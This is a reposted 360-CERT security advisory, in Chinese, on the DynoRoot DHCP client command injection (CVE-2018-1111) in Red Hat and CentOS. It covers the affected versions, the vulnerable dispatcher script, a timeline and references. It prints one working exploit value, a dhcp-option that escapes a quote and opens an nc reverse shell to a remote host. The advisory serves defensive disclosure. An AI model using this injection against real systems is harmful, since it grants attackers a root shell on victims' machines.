DynoRoot:Red Hat DHCP用户端命令执行漏洞(CVE-2018-1111)预警
报告编号: B6-2018-051601
报告来源: 360-CERT
报告作者: 360-CERT
升级日期: 2018-05-16
0x00 漏洞概述
近日,红帽官方发布了安全升级,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。
目前相关利使用代码已经公开,可使用于本地网络攻击;360-CERT此漏洞进行了技术分析,认为该漏洞危害等级严重,建议用相关使用户尽快进行升级。
0x01 漏洞影响面
影响版本
Red Hat Enterprise Linux Server 6
Red Hat Enterprise Linux Server 7
CentOS 6
CentOS 7
修复方案
受影响产品的升级
0x02 漏洞介绍
DHCP 是一个局域网的网络协议,主要使用于内部网络动态IP地址分配。
Red Hat提供的DHCP用户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。
用单引号使参数值逃逸成功,导致了命令执行
--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
0x03 时间线
2018-05-16 RedHat 官方发布升级声明
2018-05-16 360-CERT对漏洞进行评估,发布预警通告
0x04 参考链接
https://access.redhat.com/errata/RHSA-2018:1458
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://t.co/jFiOrUH6HG. Exploit fits in a tweet so you should patch as soon as possible.
— Felix Wilhelm (@_fel1x) May 15, 2018
https://dynoroot.ninja/
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是摆设,本站源码仅提供给会员学习使用!
7. 如遇到加密压缩包,请使用360解压,如遇到无法解压的请联系管理员
开心源码网 » DynoRoot:Red Hat DHCP用户端命令执行漏洞(CVE-2018-1111)预警
